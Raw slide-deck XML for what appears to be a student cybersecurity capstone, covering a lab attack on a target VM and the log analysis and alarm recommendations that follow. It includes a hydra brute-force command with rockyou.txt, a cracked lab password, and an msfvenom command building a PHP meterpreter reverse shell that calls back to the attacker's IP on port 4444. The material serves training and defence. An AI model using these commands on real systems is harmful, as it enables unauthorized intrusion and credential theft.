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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId41"/>
      <p:bold r:id="rId42"/>
      <p:italic r:id="rId43"/>
      <p:boldItalic r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId45"/>
      <p:boldItalic r:id="rId46"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId47"/>
      <p:bold r:id="rId48"/>
      <p:italic r:id="rId49"/>
      <p:boldItalic r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId51"/>
      <p:bold r:id="rId52"/>
      <p:italic r:id="rId53"/>
      <p:boldItalic r:id="rId54"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"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A3F8AC-6EEE-492E-8326-5E41E2CEAFFD}">
  <a:tblStyle styleId="{A4A3F8AC-6EEE-492E-8326-5E41E2CEAF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d9031f4c1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d9031f4c1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Error message revealing user ‘ashton’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8623a2bef4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d9031f4c1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d9031f4c1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d9031f4c1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d9031f4c1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d9031f4c1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d9031f4c1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d9031f4c1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d9031f4c1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d9031f4c12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d9031f4c1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8623a2bef4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d9031f4c12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d9031f4c1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d9031f4c1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d9031f4c1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Set the parameters to the target machine’s IP address and network port 4444</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d9031f4c12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d9031f4c1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d9031f4c12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d9031f4c1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d9031f4c12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d9031f4c1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d86d135e2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d86d135e2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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The nmap scan occurred on 5/4/2021 aroundt 1:00 AM, with 31,783 packets of data being sent from source IP 192.168.1.8 (Kali VM-Attacker Machine)</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The high volume of port connections attempted on the Target VM (Capstone)  in the short timeframe  indicates port scanning activity </a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There were a varying amount of response codes generated during the scan (401,301,207,200,404), indicating some ports were opened and accessed while others were closed and denied access</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623a2bef4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8623a2bef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data from previous data used in finding the nmap scan, the request for the hidden directory occurred shortly after the port scan (5/4/2021 at 1:00 AM)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Among the hidden directories requested were the secret_folder (which contained access to the corp server),and the webdav directory (which contained a password.dav file)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8623a2bef4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d86d135e2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d86d135e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8623a2bef4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d86d135e2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d86d135e2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d86d135e2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d86d135e2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8798eb4c4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8798eb4c4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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c4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8798eb4c4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8623a2bef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d9031f4c1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d9031f4c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192.168.1.105/company_folders/secret_folder"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James Swift</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Attempt to navigate to secret_folder directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1118" name="Google Shape;1118;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620450" y="598000"/>
            <a:ext cx="5142084" cy="4305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Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124;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5" name="Google Shape;1125;p64"/>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4"/>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Ran a brute force attack against ashton’s account using the hydra method and the rockyou.txt list of common passwords</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27" name="Google Shape;1127;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1128" name="Google Shape;1128;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9" name="Google Shape;1129;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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1131" name="Google Shape;1131;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2" name="Google Shape;1132;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64"/>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4"/>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Eventually obtained ashton’s password (leopold)</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Used ashton’s username and password to access the secret_folder directory, which granted me access to the corporate server, and instructions mentioning a webdav server and another’s account (ryan) and a hashed password that could be easily decrypted</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;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7" name="Google Shape;1137;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64"/>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4"/>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Brute Force Attack command: hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</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Ashton’s password came up after 10,143 unique password attempts</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Brute Force attack initiated on ashton’s account</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1989000" y="653950"/>
            <a:ext cx="5166001" cy="4305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Successful result of BF attack revealing ashton’s password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1781175" y="653950"/>
            <a:ext cx="5189917" cy="4305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Used ashton’s login to login to secret folder directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127000" y="4447000"/>
            <a:ext cx="7971900" cy="4821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sz="1000"/>
              <a:t>Successful login redirected me to this directory with instructions to access the company’s corporate server, also with the account username for another employee, with a hashed password for that employee’s account</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1158" name="Google Shape;1158;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1457650"/>
            <a:ext cx="8839201" cy="19091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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164;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sz="1000"/>
              <a:t>Easily managed to crack ryan’s password using crackstation’s password hash cracker tool</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1165" name="Google Shape;1165;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="686100"/>
            <a:ext cx="8839200" cy="31213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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171;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sz="1000"/>
              <a:t>Used ryan’s username and password to gain access to the company’s webdav server</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609725" y="686100"/>
            <a:ext cx="4859796" cy="407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Unauthorized File Upload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178" name="Google Shape;1178;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9" name="Google Shape;1179;p70"/>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0"/>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Created a reverse_tcp shell php payload using meterpreter</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Inserted the payload shell into the company webdav server</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81" name="Google Shape;1181;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1182" name="Google Shape;1182;p70"/>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83" name="Google Shape;1183;p70"/>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3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1185" name="Google Shape;1185;p70"/>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86" name="Google Shape;1186;p70"/>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0"/>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The reverse shell was successfully executed and enabled me to establish a meterpreter session with the target machine, enabling me to search throughout the machine’s database and access any and all files and copy them over to my host machine</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1190" name="Google Shape;1190;p70"/>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91" name="Google Shape;1191;p70"/>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2" name="Google Shape;1192;p70"/>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0"/>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Created the reverse_tcp shell with the following command: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4444 &gt;&gt; reverse_shell.php</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Uploaded the reverse_tcp payload to the target machine</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199;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sz="1000"/>
              <a:t>Re-navigated to the company’s webdav server and verified that the shell payload is now visible on the webpage</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="686100"/>
            <a:ext cx="3792176" cy="3182251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1201" name="Google Shape;1201;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4277950" y="686102"/>
            <a:ext cx="3792174" cy="31748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Created a reverse_tcp shell payload using msf_exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="66675" y="1939825"/>
            <a:ext cx="8839200" cy="10348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200"/>
              <a:t>Successfully established meterpreter session with target machine</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213" name="Google Shape;1213;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14" name="Google Shape;1214;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738325" y="686100"/>
            <a:ext cx="4882452" cy="407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1600"/>
              <a:t>This meterpreter session enabled me to navigate up to the root directory and browse all files and directories within the system, leading me to the target ‘flag’ file</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1220" name="Google Shape;1220;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21" name="Google Shape;1221;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038938" y="704600"/>
            <a:ext cx="5066135" cy="42120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200"/>
              <a:t>Flag file exposed</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227" name="Google Shape;1227;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28" name="Google Shape;1228;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="205975" y="2754250"/>
            <a:ext cx="8134350" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="205975" y="1393325"/>
            <a:ext cx="8467725" cy="790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pic>
        <p:nvPicPr>
          <p:cNvPr id="1234" name="Google Shape;1234;p76"/>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35" name="Google Shape;1235;p76"/>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36" name="Google Shape;1236;p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pic>
        <p:nvPicPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="686100"/>
            <a:ext cx="8267700" cy="4105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248" name="Google Shape;1248;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49" name="Google Shape;1249;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="686100"/>
            <a:ext cx="7758852" cy="4078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55" name="Google Shape;1255;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56" name="Google Shape;1256;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="645225"/>
            <a:ext cx="8996480" cy="44982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62" name="Google Shape;1262;p80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4382700"/>
            <a:ext cx="7971900" cy="760800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="45700" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>There were a total of 30,961 requests made for this attack to gain user Ashton’s password. The above picture shows the 30,958 failed requests made in the attack</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1263" name="Google Shape;1263;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="642666"/>
            <a:ext cx="9144000" cy="27973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69" name="Google Shape;1269;p81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4619750"/>
            <a:ext cx="7971900" cy="523800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="45700" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>This shows the 3 successful brute force attacks that enabled access to the secret_folder directory</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1270" name="Google Shape;1270;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="824835"/>
            <a:ext cx="9144000" cy="285053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76" name="Google Shape;1276;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4284000"/>
            <a:ext cx="7971900" cy="859500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="45700" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>There were a total of 34 requests made for the webdav directory. The following slides show the number of requests for files within that directory</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1277" name="Google Shape;1277;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="682044"/>
            <a:ext cx="9144000" cy="26717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83" name="Google Shape;1283;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4393400"/>
            <a:ext cx="7971900" cy="7500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sz="1100"/>
              <a:t>There were a total of 2 requests for the password.dav file</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1284" name="Google Shape;1284;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="671519"/>
            <a:ext cx="9144000" cy="272891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90" name="Google Shape;1290;p84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4609750"/>
            <a:ext cx="7971900" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="45700" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>There were a total of 4 requests for the reverse_shell.php payload that was inserted into the directory</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1291" name="Google Shape;1291;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="696300"/>
            <a:ext cx="9144000" cy="320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pic>
        <p:nvPicPr>
          <p:cNvPr id="1296" name="Google Shape;1296;p85"/>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97" name="Google Shape;1297;p85"/>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98" name="Google Shape;1298;p8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304" name="Google Shape;1304;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5" name="Google Shape;1305;p86"/>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 sz="1400"/>
              <a:t>-Have an alarm generated any time an excessive number of port scans occur within a short timeframe, or at least any scan request that comes from a source IP not on a firewall’s list of approved IP addresses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-Activate it if a scan occurs from an unauthorized source or if a scan from a verified source discovers an open port</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;p86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
